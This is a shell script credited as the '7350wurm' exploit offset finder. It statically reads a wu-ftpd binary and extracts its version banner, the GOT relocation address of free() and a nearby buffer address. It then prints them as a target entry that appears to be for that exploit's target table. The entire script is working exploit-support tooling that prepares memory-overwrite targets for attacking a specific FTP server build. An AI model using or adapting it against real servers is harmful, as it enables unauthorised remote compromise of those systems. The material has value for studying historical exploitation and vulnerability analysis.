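#!/bin/sh
# 7350wurm offset finder
# dvorak & scut
#
# Usage: <this script> /path/to/wuftpd/binary
#
# Statically inspects one binary with strings(1) and objdump(1); the binary is
# never executed. It prints:
#   - the embedded "Version..." banner string,
#   - the address column of the dynamic relocation entry for free()
#     (entries mentioning "glob", e.g. globfree, are excluded),
#   - a "$0x80..." immediate located heuristically in the disassembly near a
#     reference to strncasecmp,
# followed by the same values laid out as a C initializer entry under "target:".
#
# Every value is read from the file as link-time data, so the output describes
# exactly one build. NOTE(review): for a position-independent build objdump
# reports load-relative offsets rather than absolute addresses - confirm how
# the binary under analysis was linked before reading anything into the output.
#
# The disassembly heuristics (context windows of 3 and 200 lines, matching on
# "$0xa" and "$0x80") are kept exactly as the authors wrote them.

# A few expansions below are split on whitespace on purpose (it folds
# multi-line tool output onto one line). Turn globbing off so that splitting
# can never turn a '*' or '?' in that output into a file-name match.
set -f

# check_util UTIL... - confirm each named utility is on PATH.
# Prints "checking for UTIL: <path>" per utility; exits 1 at the first one
# that cannot be found.
check_util () {
  for util in "$@"; do
    printf 'checking for %s: ' "$util"
    # command -v is the POSIX lookup; like which(1) it prints the path found.
    if ! command -v "$util"; then
      echo "not found, aborting"
      exit 1
    fi
  done
}

# require_value LABEL VALUE - exit 1 when VALUE is empty.
# The guarded values are used as grep patterns further down, and an empty
# pattern matches every line, which would silently yield meaningless output.
require_value () {
  if [ -z "$2" ]; then
    echo "could not determine $1, aborting"
    exit 1
  fi
}

echo "7350wurm exploit offset finder"
echo

if [ $# -ne 1 ]; then
  echo "usage: $0 /path/to/wuftpd/binary"
  echo
  exit 1
fi

binary=$1
if [ ! -r "$binary" ]; then
  echo "cannot read $binary, aborting"
  exit 1
fi

check_util strings objdump
echo

# Version banner embedded in the binary.
versionstring=$(strings -- "$binary" | grep '^Version')
# shellcheck disable=SC2086 # deliberate splitting, see 'set -f' above
echo $versionstring

# Dynamic relocation records: the line ending in "free", minus glob-related
# entries; the first column is the address.
freeaddr=$(objdump -R -- "$binary" | grep 'free$' | grep -v glob |
  awk '{print $1}')
# shellcheck disable=SC2086
echo $freeaddr

# Dynamic symbol table entry for strncasecmp, leading zeros stripped so the
# value has the same form as the addresses printed in the disassembly.
strncasecmpaddr=$(objdump -T -- "$binary" | grep strncasecmp |
  awk '{print $1}' | sed 's/^0*//g')
require_value "strncasecmp address" "$strncasecmpaddr"
echo  # debug print of $strncasecmpaddr was commented out by the authors

# Within the 3 lines preceding a reference to that address, take the
# instruction carrying the literal "$0xa" and keep its address.
# grep -F: '$0xa' is fixed text, not a regular expression.
tmpaddr=$(objdump --disassemble -- "$binary" 2>/dev/null |
  grep -B3 -- "$strncasecmpaddr" |
  grep -F '$0xa' | awk '{print $1}' | cut -d ':' -f1)
require_value "reference instruction address" "$tmpaddr"
echo  # debug print ("found at $tmpaddr") was commented out by the authors

# Third line counting from the instruction at tmpaddr: the second '%'-separated
# field, i.e. the first register named on that line.
tmpreg=$(objdump --disassemble -- "$binary" | grep -A3 "^ $tmpaddr" |
  head -3 | tail -1 | cut -d '%' -f2)
require_value "register name" "$tmpreg"
echo  # debug print of $tmpreg was commented out by the authors

# In the 200 lines before tmpaddr: the first line that mentions that register
# together with a "$0x80" immediate; keep the 9 characters after the '$'.
cbufaddr=$(objdump --disassemble -- "$binary" | grep -B200 "^ $tmpaddr" |
  grep -- "$tmpreg" | grep -F '$0x80' | head -1 |
  cut -d '$' -f2- | cut -c -9)

echo "target:"
echo
echo '{ "insert exact dist, rpm, .. here",'
# shellcheck disable=SC2086
echo \"$versionstring\",
echo 'x86_wrx, sizeof (x86_wrx) - 1,'
# shellcheck disable=SC2086
echo 0x$freeaddr, $cbufaddr },
echo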